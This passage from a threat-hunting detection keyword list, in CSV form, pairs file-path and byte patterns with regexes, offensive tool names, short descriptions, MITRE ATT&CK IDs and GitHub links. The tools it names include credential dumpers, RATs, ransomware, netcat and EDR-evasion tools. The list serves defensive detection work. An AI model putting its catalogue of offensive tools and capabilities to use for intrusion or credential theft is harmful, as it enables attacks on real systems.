Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" 
"*\Windows\System32\nc.exe*",".{0,1000}\\Windows\\System32\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Windows\Tasks\a.exe*",".{0,1000}\\Windows\\Tasks\\a\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\windows\tasks\bin.exe*",".{0,1000}\\windows\\tasks\\bin\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\Windows\Tasks\Certipy*",".{0,1000}\\Windows\\Tasks\\Certipy.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden 
certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*\Windows\Tasks\p4yl0ad*",".{0,1000}\\Windows\\Tasks\\p4yl0ad.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*\Windows\Temp\Bla.exe*",".{0,1000}\\Windows\\Temp\\Bla\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*\Windows\Temp\creds.db*",".{0,1000}\\Windows\\Temp\\creds\.db.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*\windows\temp\fakefile.exe*",".{0,1000}\\windows\\temp\\fakefile\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Windows\Temp\Forensike*",".{0,1000}\\Windows\\Temp\\Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\windows\temp\nc64.exe*",".{0,1000}\\windows\\temp\\nc64\.exe.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*\windows\temp\ncat.exe -nv *",".{0,1000}\\windows\\temp\\ncat\.exe\s\-nv\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*\windows\temp\pwned.trx*",".{0,1000}\\windows\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*\Windows\Temp\temp.ps1*",".{0,1000}\\Windows\\Temp\\temp\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1021 - T1048 - T1077 - T1087 - T1090 - T1135 - T1210","TA0001 - TA0002 - 
TA0007 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\Windows\Ui\index.html*",".{0,1000}\\Windows\\Ui\\index\.html.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\windows_x64_admin.exe*",".{0,1000}\\windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\windows_x64_agent.exe*",".{0,1000}\\windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\windows_x86_admin.exe*",".{0,1000}\\windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\windows_x86_agent.exe*",".{0,1000}\\windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\Windows-Passwords.ps1*",".{0,1000}\\Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*\WindowsShareFinder.cs*",".{0,1000}\\WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*\WINHELLO2hashcat.py*",".{0,1000}\\WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\winPEAS.sln*",".{0,1000}\\winPEAS\.sln.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*\winPEASexe\*",".{0,1000}\\winPEASexe\\.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*\WinPirate.bat*",".{0,1000}\\WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" 
"*\WinPirate\Tools\*",".{0,1000}\\WinPirate\\Tools\\.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\WinPirate-master*",".{0,1000}\\WinPirate\-master.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\Win-PS2EXE*",".{0,1000}\\Win\-PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*\winscp_dump.py*",".{0,1000}\\winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\winsos.cpp*",".{0,1000}\\winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" 
"*\winsos.exe*",".{0,1000}\\winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*\WiperPoc.cpp*",".{0,1000}\\WiperPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*\wireless.py*",".{0,1000}\\wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\wl_log.txt*",".{0,1000}\\wl_log\.txt.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\wl-lic.exe*",".{0,1000}\\wl\-lic\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\wl-lic.pdb*",".{0,1000}\\wl\-lic\.pdb.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via 
Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\wmi_1.dll*",".{0,1000}\\wmi_1\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*\wmi_2.dll*",".{0,1000}\\wmi_2\.dll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*\wmi_exec.exe*",".{0,1000}\\wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\wmievasions.ps1*",".{0,1000}\\wmievasions\.ps1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*\wmiexec.zip*",".{0,1000}\\wmiexec\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\WMIReg.exe*",".{0,1000}\\WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Worm.dll*",".{0,1000}\\Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\WOW6432Node\Kidlogger*",".{0,1000}\\WOW6432Node\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","registry","10","10","N/A","N/A","N/A","N/A" "*\wraith.py*",".{0,1000}\\wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-master.zip*",".{0,1000}\\wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-RAT-payloads*",".{0,1000}\\wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-server.py*",".{0,1000}\\wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-server_v*.py*",".{0,1000}\\wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" 
"*\WritebleRegistryKeys.txt*",".{0,1000}\\WritebleRegistryKeys\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\WriteOutputCommand.cs",".{0,1000}\\WriteOutputCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\ws-dirs.txt*",".{0,1000}\\ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\ws-files.txt*",".{0,1000}\\ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\WSPCoerce.cs*",".{0,1000}\\WSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts 
using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*\wstunnel.exe",".{0,1000}\\wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*\wstunnel\certs\*",".{0,1000}\\wstunnel\\certs\\.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*\x24\xC3\C:\\Windows\\System32\\calc.exe\x00*",".{0,1000}\\x24\\xC3\\C\:\\\\Windows\\\\System32\\\\calc\.exe\\x00.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69*",".{0,1000}\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x77\\x68\\x6f\\x61\\x6d\\x69.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*\x44\x8b\x01\x44\x39\x42*",".{0,1000}\\x44\\x8b\\x01\\x44\\x39\\x42.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72*",".{0,1000}\\x4d\\x5a\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x0e\\x1f\\xba\\x0e\\x00\\xb4\\x09\\xcd\\x21\\xb8\\x01\\x4c\\xcd\\x21\\x54\\x68\\x69\\x73\\x20\\x70\\x72.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\x64\Release\indirect.exe *",".{0,1000}\\x64\\Release\\indirect\.exe\s.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote 
